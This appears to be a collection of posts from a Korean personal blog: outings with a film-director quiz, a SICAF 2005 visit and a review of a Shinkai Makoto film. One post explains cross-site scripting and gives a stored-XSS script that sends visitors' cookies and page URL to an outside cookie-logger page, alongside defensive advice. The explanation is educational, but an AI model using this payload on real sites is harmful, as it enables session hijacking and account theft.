White Rabbit

본문

아직 8월이기는 하지만

외출하기 좋은 날씨가 되었다.

지난 주와 이번 주 돌아다닌 흔적들.

이대 앞 "씽"이라는 가게의 컬렉션들.

여기서 지갑을 샀는데 대만족이삼. ( -_-)-b

이대에서 만난 검은 고양이 -_-ㅋ

삼청동의 한 골목. 따라 올라가보면 이상한 세계가 나올 것 같은;;;

삼청동에는 처음 가 봤는데, 매우 맘에 들었다.

여기서 퀴즈:

위의 글에서 연상되는 인물이 없으신가요? ^_^;;; (이번엔 매우 쉽군~)

♪ Placebo - Summer's Gone ♪

_______________________________________________________________

참여해주신 분이 워낙 없다보니 퀴즈낸 걸 까먹고 있었군요-_-

답은 "허진호" 감독입니다.

<8월의 크리스마스>, <봄날은 간다>, <외출> 등을 감독했죠.

아...(원래 그랬지만-_-) 제 블로그도 인기척이 드물어져가는군요.ㅡㅜ

본문

해커라고 하면 일반적으로 이런 이미지를 떠올릴 것 같습니다.컴터만 켜져 있는 어두컴컴한 방, 컴터 주위에 널려있는 쓰레기들, 하얗게 뜬 얼굴에 뚱뚱하거나 완전 마른 몸. 물론 실제로 보면 꼭 그런 것만은 아니겠죠. 해킹도 마찬가지입니다. 보통 해킹이라고 하면 다른 서버나 사용자의 컴퓨터에 침입하여 온갖 정보들을 빼 내고 추적되기 전에 무사히 빠져나가는 이미지일텐데요. 남의 집에 문을 따고 들어가 윈도 암호를 찍어서 맞추고 디스켓으로 정보를 빼 온다고 해도 마찬가지로 해킹입니다. 어쩌면 가장 확실한 방법일지도 모르겠군요. :)

여기서 소개하는 XSS 역시 간단하면서도 강력할 수 있는 해킹 방법 중 하나입니다. 악의적인 사용자가 웹서버를 통해 다른 클라이언트의 컴퓨터에서 악의적인 코드를 실행시키는 것이 바로 XSS라고 할 수 있습니다. 크게 client-to-client와 client-to-itself 방식으로 분류할 수 있습니다.

XSS를 이해하기 위해서는 먼저 스크립트 언어가 어떻게 동작하는지 알아야 합니다. 웹페이지를 나타내기 위해선 당연히 HTML으로 페이지를 구성해야겠죠. 하지만 HTML 만으로는 정적인 페이지밖에 만들 수 없습니다. 만약 게시판이라도 만드려면 모든 페이지를 각각 다른 HTML로 만들어줘야 하겠죠. 이를 위해 웹서버에서 실행되는 CGI(Common Gateway Interface)가 존재합니다. 흔히 알고 있는 서버사이드 스크립트 언어인 PHP, JSP, ASP 등은 모두 CGI 프로그램으로, 사용자가 요청했을때 웹서버에서 실행되어 그 결과를 사용자에게 돌려줍니다. 즉, CGI 프로그램으로 인해 동적인 웹페이지를 구성할 수 있게 되는 것이죠.

이와 반대로 사용자의 컴퓨터에서 실행되는 스크립트 언어가 있습니다. 바로 자바스크립트나 비주얼베이직스크립트 등이 그들입니다. 자바스크립트가 삽입되지 않은 웹페이지를 찾기가 드물 정도로 자바스크립트는 많이 사용되는데, 자바스크립트의 특징은 웹페이지가 로드된 후 사용자의 웹브라우저에서 실행된다는 것입니다. 만약 어떤 서버사이드 스크립트의 실행시간이 매우 오랜 시간이 걸린다면, 웹서버에는 많은 부하를 주겠지만 정작 사용자의 컴터는 멀쩡합니다. 단지 페이지가 로딩되는데 시간이 많이 걸릴 뿐이고, 가끔 404 Not Found 에러가 날 뿐이죠. 그러나 자바스크립트가 실행시간이 매우 오래 걸린다면 사용자의 컴터에 영향을 줍니다. 심지어 컴터가 다운되는 사태가 발생할 수도 있죠.

XSS는 사용자의 컴퓨터에서 자바스크립트가 실행된다는 점을 이용합니다. 일단 다른 사용자의 컴퓨터에 접근하기 위해 웹서버를 경유해야겠죠. XSS를 걸러내지 못하는 게시판에 글을 썼다고 가정합시다. 다음과 같은 코드를 글 가운데에 넣었습니다.

[script]

  for(i=0; i<100; ++i) {

    alert("Hello, World!");

  }

[/script]

이 스크립트는 글 내용과 함께 웹서버의 데이터베이스에 저장됩니다. 그리고 다른 사용자가 게시판에서 이 글을 조회하려 할 때, 그 사용자의 컴퓨터에서 스크립트가 실행되는 것이죠. 위의 스크립트는 "Hello, World!"라는 내용의 경고창을 100번 띄우게 됩니다-_- 당하는 사람의 입장에서는 매우 짜증나는 일이겠죠. 이것이 가장 간단한 방식의 client-to-client XSS입니다.

이렇게 XSS를 발생시키는 일은 매우 간단합니다. 그리고 악의적으로 할 수 있는 일도 매우 다양하죠. 자바스크립트 대신 [Object]나 [Embed] 태그를 사용하여 ActiveX 프로그램을 다른 사용자의 컴퓨터에 설치할 수도 있고, [Applet] 태그로 엉뚱한 자바 애플릿을 실행시킬 수도 있습니다. 그러나 가장 위험한 것은 역시 사용자의 정보를 다른 곳으로 빼돌릴 수 있다는 점입니다.

지난 번에 쿠키에 대해 간단히 설명드렸지만, 쿠키에는 사용자에게 민감한 정보들이 많이 들어있습니다. 이를테면 세션 쿠키 등을 훔치면 그 사용자의 아이디와 비밀번호를 몰라도 마치 그 사용자인양 로그인할 수도 있죠. XSS를 이용하면 이 쿠키 정보를 매우 간단히 훔칠 수 있습니다. 다음 스크립트가 어떤 게시판의 글 가운데 삽입되어 다른 사용자의 컴퓨터에서 실행된다고 가정해 봅시다.

[script]

  var url = "http://member.jinbo.net/renegade/cookieLogger.php?c=" + document.cookie + "&url=" + document.URL;

  document.location.replace(url);

[/script]

코드에 나온 document.cookie는 사용자의 쿠키를 출력합니다. 물론 document.URL은 해당 사이트의 url을 출력하지요. 예를 들면 http://blog.jinbo.net에 들어간 후, 주소창에 다음과 같은 코드를 치고 실행하면 쉽게 알 수 있을 것입니다.

javascript:alert(document.cookie)

blog.jinbo.net에서 사용하는 쿠키가 어떤 것이 있는지 알 수 있죠. XSS 스크립트는 이런 식으로 특정 사용자만이 알 수 있는 값을 악의적인 사용자 레니의 프로그램인 cookieLogger.php로 보내줍니다. cookieLogger.php는 게시판의 글을 읽는 사람들의 쿠키들을 받아 따로 저장할 수도 있고 악의적으로 이용할 수도 있습니다. 이렇게 XSS는 보안상 위험한 상황을 발생시키기도 하죠.

사실 XSS는 너무나 잘 알려진 취약성이기 때문에 대부분의 웹어플리케이션에서는 이에 대한 대비를 하고 있습니다. 예를 들면 글의 내용 중에 [script]나 [embed]라는 태그를 사용한다면 이를 [x-script]나 [x-embed]로 바꿔서 실행되지 못하도록 하기도 하고, "<"를 아예 특수문자인 "&lt;"로 바꿔서 저장하기도 합니다. 그러나 사용자의 입력을 받을 수 있는 곳은 어디나 XSS가 발생할 소지가 있으며, 웹어플리케이션 개발자는 항상 이 문제에 신경을 쓰고 개발을 해야 하겠죠.

...물론 타인의 정보를 훔치려고 하지 않는 센스가 더 중요하겠죠? :)

본문

SICAF 2005의 장편 경쟁부문 출품작이다. 국내에서 처음으로 소개되는 것인 줄 알았는데, 알고보니 이미 올해 5월에 DVD로는 출시가 되었었더군-_-

SICAF의 인기가 대단한 것인지, 이 작품을 상영한다는 소식을 듣고 예매 상황을 살펴보니 모든 회가 이미 매진이었다.(대부분의 장편 경쟁부문 작품들이 매진이긴 했지만) 그러나 노력하는 자에게는 결실이 있는 법. 3일 동안의 F5 신공...-_-으로 인터넷 예매 종료 15분 전에 결국 성공했다-_-v (정말이지 못 보는 줄 알았다니깐)

<구름의 저편, 약속의 장소>

사유리가 열차에서 내린 후 철도를 따라 걷는 장면이다.

신카이 마코토의 작품은 <그녀와 그녀의 고양이>를 보았고, <별의 목소리>는 아직 못 봤다. <그녀와...>는 5분 가량의 짧은 단편이고 흑백 화면에다 캐릭터의 얼굴이 나오지 않는 작품이라 신카이 마코토의 내공을 제대로 확인하기 힘들었다. 소문에 의하면-_- <별의 목소리> 역시 25분 가량의 단편이라고 했으니 사실상 장편은 <구름의 저편...>이 처음이 아닐까 한다.

<구름의 저편, 약속의 장소>

탑을 배경으로 얘기하고 있는 사유리

처음 시작하면 일단 화려한 배경에 놀라게 된다. 탄성이 나올 정도로 배경이 세밀하고 아름답게 그려진다. 캐릭터 얼굴의 엉성함(...이라고 해야 하나, 뭔가 포스가 느껴지지 않는 얼굴 모양)에 비해, 배경이나 인체 비례, 색조 등은 정말이지 대단하다. 약간 오바해서 스토리 하나도 없이 배경만 본다고 하더라도 괜찮을 정도로 이 사람, 그림 잘 그린다.( -_-)-b

<구름의 저편, 약속의 장소>

히로키와 타쿠야가 비밀 창고에서 뱅기를 만들고 있다.

<그녀와...>를 보고 나서 생긴 편견일지도 모르겠지만, 난 신카이 마코토가 왠지 메카닉을 잘 못 그릴 것 같단 생각을 했었다. 하지만 웬 걸. <별의 목소리>에서도 좋은 메카닉 디자인이 나온다고 들었지만, <구름의 저편...>에 나오는 메카닉들은 대단하다. 히로키와 타쿠야가 만드는 뱅기인 "벨라실러"의 독창적인 디자인 하며, 아마도 (밀리터리에는 관심이 없어서-_- 어떤 기종인지는 모르겠지만) 실제를 모델로 그린 것이 분명한 전투기들과 함정들은, 신카이 마코토가 캐릭터 얼굴 빼고는-_- 못 그리는 것이 없다는 사실을 증명하는 듯 했다.ㅋ

<그녀와 그녀의 고양이>

대충 그려도 고양이처럼 생겼다.ㅎㅎ

<그녀와...>를 볼 때 음향이 상당히 좋았다. 컷의 전환을 자연스레 도와주면서 은근히 깔리는 매력적인 음향은 <구름의 저편...>에서도 빛을 발한다. 그러고 보니 <구름의 저편...>에서도 고양이가 한 마리 나오는데, 위의 고양이보다 조금 더 자세하게 생겼다.ㅋ

<별의 목소리>

도입부의 멋진 배경이다.

<별의 목소리>도 그렇다고 하지만. <구름의 저편...>도 그리움과 고독에 대한 이야기다. 사실 1/3 쯤만 보면 전체적인 스토리는 짐작 가능하지만, 일단 그림이 좋기 때문에 별로 지루하지 않고 연출도 나쁘지 않다. 신카이 마코토는 그림과 더불어 동작을 표현하는 기술이 대단한 것 같다. 아무리 잘만든 애니라 해도 뛰는 모습같이 비선형적인 동작은 뭔가 어색한 작품들이 많은데, <구름의 저편...>에서는 모든 동작이 자연스럽게 보인다. 사실 이 부분이 가장 맘에 들었다.

<그녀와...>와 <별의 목소리>는 거의 신카이 마코토 한 사람이 다 만들었다고 하는데, <구름의 저편...>은 장편이라 많은 사람들의 참여가 있었다. 끝나고 크레딧이 올라가는 것을 유심히 봤는데, 그럼에도 제작, 작화, 색채, 음향, 작사까지...신카이 마코토가 끼지 않은 부분이 거의 없더군-_- 정말 대단한 인간이다.

...얼굴만 잘 그렸으면 정말 좋았을텐데.ㅎㅎㅎ

(To Be Continued...)

본문

SICAF 2005 갔다.

신카이 마코토의 <구름의 저편, 약속의 장소>를 봤는데

천신만고 끝에 간신히 표를 구한 덕분인지 너무 재미있었음=_=

이 사람 정말이지 그림 너무 잘 그린다.

감상평은 내일-_-

다음은 전시관 사진 몇 장.

서울문화사 부스 안에 있던 "친절한 윙크씨".ㅋㅋㅋ

천원의 압박에 잠시 망설였음.

아마 대원 부스에 있던 BL들(이라고 jineeya가 설명해 줌-_-)

"19세 미만 판매불가"가 인상적 ( -_-)-b

아아 이 캐릭터. 이름은 모르겠지만 너무너무 갖고 싶었음=_=

몰래 들고올 껄 그랬나;;;

코엑스가 원래 좀 그렇긴 하지만

전시장이 너무 넓은 데 비해 부스가 산만해서 돌아다니다 보니 다리가 아팠다.

판매 부스는 왜이리 많은 것이야. 값도 결코 싸지도 않으면서;;;

"저항만화전"은 볼 만 했음. 이두호 스페셜-_-하고.

그래도 역시

휴일의 코엑스몰은 갈 만한 곳이 못 되는 듯-_-

(To Be Continued...)

본문

 프로젝트 D

두둥 ( -_-);;;

Coming Soon...

사슴벌레님, 힘내셈^_^
♪ 델리스파이스 - 동병상련 ♪

from 4th album "D"

그것은 한순간의 빛

본문

계속 덥다덥다덥다고 투덜투덜투덜거렸는데
그래도 여름이라면 이 정도 더워야 하는 거 아냐?
...란 의외의 대답이=_=
오오 멋있다
언젠가 써먹어야지.ㅋ

♪ BT - Firewater ♪